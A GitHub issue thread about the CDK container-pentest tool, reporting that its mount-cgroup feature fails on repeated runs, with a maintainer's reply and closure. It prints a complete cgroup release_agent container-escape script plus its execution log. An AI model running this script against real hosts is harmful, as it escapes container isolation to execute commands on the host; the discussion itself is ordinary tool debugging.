mount-cgroup无法多次执行命令 #35

ghost · 2022-02-12T04:01:37Z

请详细描述你遇到的问题 (Please describe the issue in detail)

mount-cgroup无法多次执行命令

root@0a8d085e98bf:/cdk# ./cdk_linux_amd64 run mount-cgroup "whoami"
2022/01/25 02:17:56 user-defined shell payload is whoami
2022/01/25 02:17:56 generate shell exploit with user-input cmd:

whoami

#!/bin/sh
mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq
echo 1 > /tmp/cgrp/cdk_oeq/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd_oeq" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd_oeq
echo "whoami > $host_path/output_oeq" >> /cmd_oeq
chmod a+x /cmd_oeq
sh -c "echo \$\$ > /tmp/cgrp/cdk_oeq/cgroup.procs"
sleep 3
cat /output_oeq

2022/01/25 02:17:56 shell script saved to exploit_oeq.sh
2022/01/25 02:17:59 Execute Shell:./exploit_oeq.sh . failed:
exit status 1

附加信息(Additional Information)

1、根据分析发现，生成的payload脚本中

mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq

由于mount在第一次已经挂载导致命令执行异常从而影响mkdir -p /tmp/cgrp/cdk_oeq命令的执行

需要修改&&命令连接符以解决该问题

The text was updated successfully, but these errors were encountered:

neargle · 2022-02-13T12:09:20Z

这里应该能全部调整为纯golang实现，我加个TODO。

kmahyyg mentioned this issue Mar 9, 2022

Implement mount-cgroup in Golang style #40

Merged

neargle closed this as completed in #40 Mar 9, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

mount-cgroup无法多次执行命令 #35

mount-cgroup无法多次执行命令 #35

ghost commented Feb 12, 2022

neargle commented Feb 13, 2022

mount-cgroup无法多次执行命令 #35

mount-cgroup无法多次执行命令 #35

Comments

ghost commented Feb 12, 2022

请详细描述你遇到的问题 (Please describe the issue in detail)

附加信息(Additional Information)

neargle commented Feb 13, 2022